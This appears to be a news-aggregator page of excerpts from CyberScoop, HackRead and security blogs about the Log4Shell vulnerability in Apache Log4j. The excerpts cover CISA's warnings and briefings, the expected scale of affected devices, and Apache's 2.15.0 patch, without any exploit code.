Collaborate Disseminate
Due to the extraordinary widespread use of the open-source Apache Log4j library, the saga of the Log4Shell (CVE-2021-44228) vulnerability is nowhere near finished. As Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute, recently not… Continue reading Log4Shell: A new fix, details of active attacks, and risk mitigation recommendations
A top government cyber official said Tuesday that the Cybersecurity and Infrastructure Security Agency hasn’t seen hackers compromise federal agencies by exploiting the Apache Log4j vulnerability — but the agency’s still fearful of widespread attacks stemming from it. Most of all, CISA’s Eric Goldstein said during a phone call Tuesday evening, the government is eager for help from the public in assembling a comprehensive list of all the products that might be susceptible to hackers using the vulnerability, known as Log4Shell in the widely deployed logging library, which the agency expects could affect hundreds of millions of devices or more. CISA and private sector cybersecurity investigators have struck exceptionally dire notes about the potential fallout that have not, as of yet, come to fruition. It’s that unknown potential, however, that has prompted CISA to try to get organizations to patch their systems and take other steps to secure them. “Certainly […]
The post CISA probes scope, potential fallout of Log4j vulnerability appeared first on CyberScoop.
Continue reading CISA probes scope, potential fallout of Log4j vulnerability
Everyone is talking about Log4Shell, a zero-day remote code execution exploit in versions of log4j, the popular open source Java logging library. Continue reading Log4Shell: The race is on to fix millions of systems and internet-connected devices
Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability in a widely-used logging library “is one of the most serious I’ve seen in my entire career, if not the most serious.” “We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said of the Apache Log4j flaw. The issue is an unauthenticated remote execution vulnerability that could allow an intruder to take over an affected device. Hundreds of millions of devices are likely to be affected, said Jay Gazlay of CISA’s vulnerability management office in the call with critical infrastructure owners and operators. CISA, a component of the Department of Homeland Security, is setting up a dedicated website as soon as Tuesday to provide information and counter “active disinformation,” said Eric […]
The post CISA warns ‘most serious’ Log4j vulnerability likely to affect hundreds of millions of devices appeared first on CyberScoop.
The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency will host a call with critical infrastructure stakeholders Monday afternoon about a critical vulnerability affecting products with the Log4j software library, according to a statement. CISA sent out an alert Friday that the agency had added the flaw to its list of exploited vulnerabilities, and urged federal and civilian organizations to patch and take steps to mitigate harm immediately. Log4j is a widely-used open-source logging tool popular in numerous cloud and enterprise apps including Minecraft, Apple Cloud, Cloudflare and Twitter, making the extent of the zero-day’s potential damage likely wide-reaching. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the log4j software library,” CISA director Jen Easterly said in a statement. “This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use.” Cybersecurity researchers noted over the weekend that […]
The post CISA to brief critical infrastructure companies about urgent new Log4j vulnerability appeared first on CyberScoop.
Several days have passed since the dramatic reveal of CVE-2021-44228 (aka Log4Shell), an easily exploitable (without authentication) RCE flaw in Apache Log4j, a popular open-source Java-based logging utility that’s seemingly used by most enterpri… Continue reading Log4Shell update: Attack surface, attacks in the wild, mitigation and remediation
Find out how to deal with the Log2Shell vulnerability right across your estate. Yes, you need to patch, but that helps everyone else along with you! Continue reading Log4Shell explained – how it works, why you need to know, and how to fix it
By Waqas
Apache has released Log4j version 2.15.0 to address the RCE vulnerability and users are urged to apply the update ASAP.
This is a post from HackRead.com Read the original post: Hackers actively exploiting 0-day in Ubiquitous Apache Log4j tool
Continue reading Hackers actively exploiting 0-day in Ubiquitous Apache Log4j tool
By Waqas
Apache has released Log4j version 2.15.0 to address the RCE vulnerability and users are urged to apply the update ASAP.
This is a post from HackRead.com Read the original post: Hackers actively exploiting 0-day in Ubiquitous Apache Log4j tool
Continue reading Hackers actively exploiting 0-day in Ubiquitous Apache Log4j tool